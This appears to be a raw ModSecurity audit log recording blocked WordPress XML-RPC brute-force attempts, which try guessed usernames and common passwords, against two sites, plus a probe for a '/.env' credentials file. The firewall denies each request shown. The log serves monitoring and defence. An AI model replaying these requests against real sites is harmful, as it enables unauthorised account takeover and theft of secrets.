Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62ccd32b-Z-- --a312995b-A-- [05/Jun/2025:16:19:04 +0700] aEFhCOth7G2xELALzPZQOQAAANM 103.236.140.4 33626 103.236.140.4 8181 --a312995b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a312995b-C-- wp.getUsersBlogs wakakur mickey --a312995b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a312995b-E-- --a312995b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115144146832 4769 (- - -) Stopwatch2: 1749115144146832 4769; combined=3440, p1=425, p2=2705, p3=0, p4=0, p5=169, sr=85, sw=141, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a312995b-Z-- --7cf8d60a-A-- [05/Jun/2025:16:20:04 +0700] aEFhRH-K7ToMdu-YSIJPAQAAABI 103.236.140.4 36746 103.236.140.4 8181 --7cf8d60a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7cf8d60a-C-- wp.getUsersBlogs wakakur anthony1 --7cf8d60a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cf8d60a-E-- --7cf8d60a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115204361532 5069 (- - -) Stopwatch2: 1749115204361532 5069; combined=3712, p1=430, p2=2973, p3=0, p4=0, p5=169, sr=84, sw=140, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cf8d60a-Z-- --7f20f959-A-- [05/Jun/2025:16:20:47 +0700] aEFhb3-K7ToMdu-YSIJPrgAAABQ 103.236.140.4 38960 103.236.140.4 8181 --7f20f959-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7f20f959-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminSoleh@[_host_].com --7f20f959-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f20f959-E-- --7f20f959-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115247467960 6027 (- - -) Stopwatch2: 1749115247467960 6027; combined=4406, p1=578, p2=3649, p3=0, p4=0, p5=106, sr=211, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f20f959-Z-- --2e50e01b-A-- [05/Jun/2025:16:21:04 +0700] aEFhgOth7G2xELALzPZRZwAAANg 103.236.140.4 39316 103.236.140.4 8181 --2e50e01b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --2e50e01b-C-- wp.getUsersBlogs wakakur poohbear --2e50e01b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e50e01b-E-- --2e50e01b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115264071611 5554 (- - -) Stopwatch2: 1749115264071611 5554; combined=3947, p1=474, p2=3246, p3=0, p4=0, p5=133, sr=104, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e50e01b-Z-- --9c0ac509-A-- [05/Jun/2025:16:21:26 +0700] aEFhlirHpfaS2Cuwh8UB7gAAAFQ 103.236.140.4 39382 103.236.140.4 8181 --9c0ac509-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9c0ac509-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmindemo123456 --9c0ac509-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c0ac509-E-- --9c0ac509-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115286232750 4659 (- - -) Stopwatch2: 1749115286232750 4659; combined=3577, p1=377, p2=3015, p3=0, p4=0, p5=106, sr=80, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c0ac509-Z-- --03d39c7f-A-- [05/Jun/2025:16:22:04 +0700] aEFhvFwdJdhOudw5hdz3VwAAAJM 103.236.140.4 39474 103.236.140.4 8181 --03d39c7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --03d39c7f-C-- wp.getUsersBlogs wakakur william1 --03d39c7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03d39c7f-E-- --03d39c7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115324909924 5234 (- - -) Stopwatch2: 1749115324909924 5234; combined=3710, p1=466, p2=3056, p3=0, p4=0, p5=109, sr=105, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03d39c7f-Z-- --bbd50774-A-- [05/Jun/2025:16:23:04 +0700] aEFh-CrHpfaS2Cuwh8UB_wAAAE8 103.236.140.4 39574 103.236.140.4 8181 --bbd50774-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --bbd50774-C-- wp.getUsersBlogs wakakur 123456789q --bbd50774-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbd50774-E-- --bbd50774-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115384994133 5355 (- - -) Stopwatch2: 1749115384994133 5355; combined=3780, p1=470, p2=3095, p3=0, p4=0, p5=123, sr=102, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbd50774-Z-- --f94efc0a-A-- [05/Jun/2025:16:23:46 +0700] aEFiIuth7G2xELALzPZRkAAAANE 103.236.140.4 39654 103.236.140.4 8181 --f94efc0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.29.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.29.219 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f94efc0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f94efc0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749115426434641 884 (- - -) Stopwatch2: 1749115426434641 884; combined=340, p1=300, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f94efc0a-Z-- --86d8e515-A-- [05/Jun/2025:16:24:08 +0700] aEFiOFwdJdhOudw5hdz3XAAAAJY 103.236.140.4 39662 103.236.140.4 8181 --86d8e515-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --86d8e515-C-- wp.getUsersBlogs wakahumas r007p455w0rd --86d8e515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86d8e515-E-- --86d8e515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115448885067 5416 (- - -) Stopwatch2: 1749115448885067 5416; combined=3833, p1=485, p2=3176, p3=0, p4=0, p5=101, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86d8e515-Z-- --884dea55-A-- [05/Jun/2025:16:25:08 +0700] aEFidCrHpfaS2Cuwh8UCLgAAAEc 103.236.140.4 39802 103.236.140.4 8181 --884dea55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --884dea55-C-- wp.getUsersBlogs wakahumas wakahumas2001 --884dea55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --884dea55-E-- --884dea55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115508791824 5206 (- - -) Stopwatch2: 1749115508791824 5206; combined=3804, p1=451, p2=3168, p3=0, p4=0, p5=107, sr=86, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --884dea55-Z-- --003c9f74-A-- [05/Jun/2025:16:26:09 +0700] aEFisVwdJdhOudw5hdz3dAAAAJc 103.236.140.4 39974 103.236.140.4 8181 --003c9f74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --003c9f74-C-- wp.getUsersBlogs wakahumas Marketing2023_ --003c9f74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --003c9f74-E-- --003c9f74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115569664611 5368 (- - -) Stopwatch2: 1749115569664611 5368; combined=3839, p1=458, p2=3212, p3=0, p4=0, p5=100, sr=99, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --003c9f74-Z-- --2109170b-A-- [05/Jun/2025:16:27:10 +0700] aEFi7n-K7ToMdu-YSIJQOAAAABI 103.236.140.4 40178 103.236.140.4 8181 --2109170b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --2109170b-C-- wp.getUsersBlogs wakahumas Marketing_ --2109170b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2109170b-E-- --2109170b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115630376159 4336 (- - -) Stopwatch2: 1749115630376159 4336; combined=3312, p1=368, p2=2779, p3=0, p4=0, p5=96, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2109170b-Z-- --63c2c256-A-- [05/Jun/2025:16:27:14 +0700] aEFi8n-K7ToMdu-YSIJQOQAAAAE 103.236.140.4 40180 103.236.140.4 8181 --63c2c256-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 139.59.17.212 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --63c2c256-C-- system.multicallmethodNamewp.getUsersBlogsparamswebzoWebzo@1234 --63c2c256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63c2c256-E-- --63c2c256-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 139.59.17.212 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115634078974 4551 (- - -) Stopwatch2: 1749115634078974 4551; combined=3550, p1=381, p2=3011, p3=0, p4=0, p5=92, sr=78, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63c2c256-Z-- --5e40e105-A-- [05/Jun/2025:16:28:11 +0700] aEFjK1wdJdhOudw5hdz3ewAAAII 103.236.140.4 40330 103.236.140.4 8181 --5e40e105-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5e40e105-C-- wp.getUsersBlogs wakahumas password1 --5e40e105-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e40e105-E-- --5e40e105-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (54+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115691455056 4256 (- - -) Stopwatch2: 1749115691455056 4256; combined=3251, p1=367, p2=2719, p3=0, p4=0, p5=96, sr=97, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e40e105-Z-- --3b6cac53-A-- [05/Jun/2025:16:29:00 +0700] aEFjXH-K7ToMdu-YSIJQRgAAAAs 103.236.140.4 40480 103.236.140.4 8181 --3b6cac53-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3b6cac53-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2021! --3b6cac53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b6cac53-E-- --3b6cac53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115740739602 5214 (- - -) Stopwatch2: 1749115740739602 5214; combined=3819, p1=452, p2=3197, p3=0, p4=0, p5=100, sr=96, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b6cac53-Z-- --f83ecd08-A-- [05/Jun/2025:16:29:12 +0700] aEFjaFwdJdhOudw5hdz3qgAAAJA 103.236.140.4 40494 103.236.140.4 8181 --f83ecd08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f83ecd08-C-- wp.getUsersBlogs wakahumas zaq1xsw2 --f83ecd08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f83ecd08-E-- --f83ecd08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115752325818 4472 (- - -) Stopwatch2: 1749115752325818 4472; combined=3365, p1=387, p2=2814, p3=0, p4=0, p5=95, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
